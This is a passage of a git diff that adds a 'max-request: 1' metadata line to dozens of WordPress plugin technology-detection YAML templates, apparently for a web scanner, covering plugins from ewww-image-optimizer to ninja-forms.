a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - 